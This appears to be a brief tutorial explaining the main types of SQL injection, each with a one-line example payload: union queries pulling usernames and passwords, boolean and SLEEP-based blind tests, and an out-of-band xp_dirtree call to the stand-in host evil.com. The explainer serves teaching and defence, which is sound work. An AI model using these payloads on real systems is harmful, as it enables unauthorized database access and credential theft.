What is SQL Injection?

SQL injection is a vulnerability that allows attackers to access a database and execute malicious queries to retrieve sensitive data.

What is Type of SQL Injection ?

Band :

Error-based : occurs when the attacker manipulates the query in such a way that the database returns error messages that can reveal information about the database structure. This technique often helps identify vulnerabilities, such as table names or column information, that can be exploited further.
Example: Injecting something like UNION SELECT 1,2,3 -- might cause an error that reveals internal database details

Union Based :

the attacker uses the UNION operator to combine the results of two or more SQL queries. This technique allows attackers to retrieve data from additional tables by appending a malicious query.
Example: Injecting UNION SELECT username, password FROM users -- can append a query to fetch usernames and passwords.

Blind :

Boolean-Based: involves sending queries that return true or false based on the injected SQL logic. The attacker can infer whether certain queries are true by observing how the web application behaves (e.g., different error messages, page loading times).
Example: Injecting 1 OR 1=1 will always return true, while 1 AND 1=2 will return false, allowing the attacker to deduce sensitive information based on responses.
time-based : attacker causing the database to delay its response by executing a time-intensive operation (e.g., SLEEP() function in MySQL). If the response is delayed, it confirms the SQL injection vulnerability.
Example Injecting SLEEP(5) in a query would cause the server to delay its response by 5 seconds, confirming the injection.

out-of-band :

occur when the attacker triggers a database operation that communicates with an external server (e.g., sending data via DNS or HTTP requests). This technique is used when there is no immediate response from the server or the server doesn't return error messages.
Example: Injecting a payload that triggers a DNS query, such as SELECT * FROM users; xp_dirtree('\\\\evil.com\\share'), sends data to the attacker's server.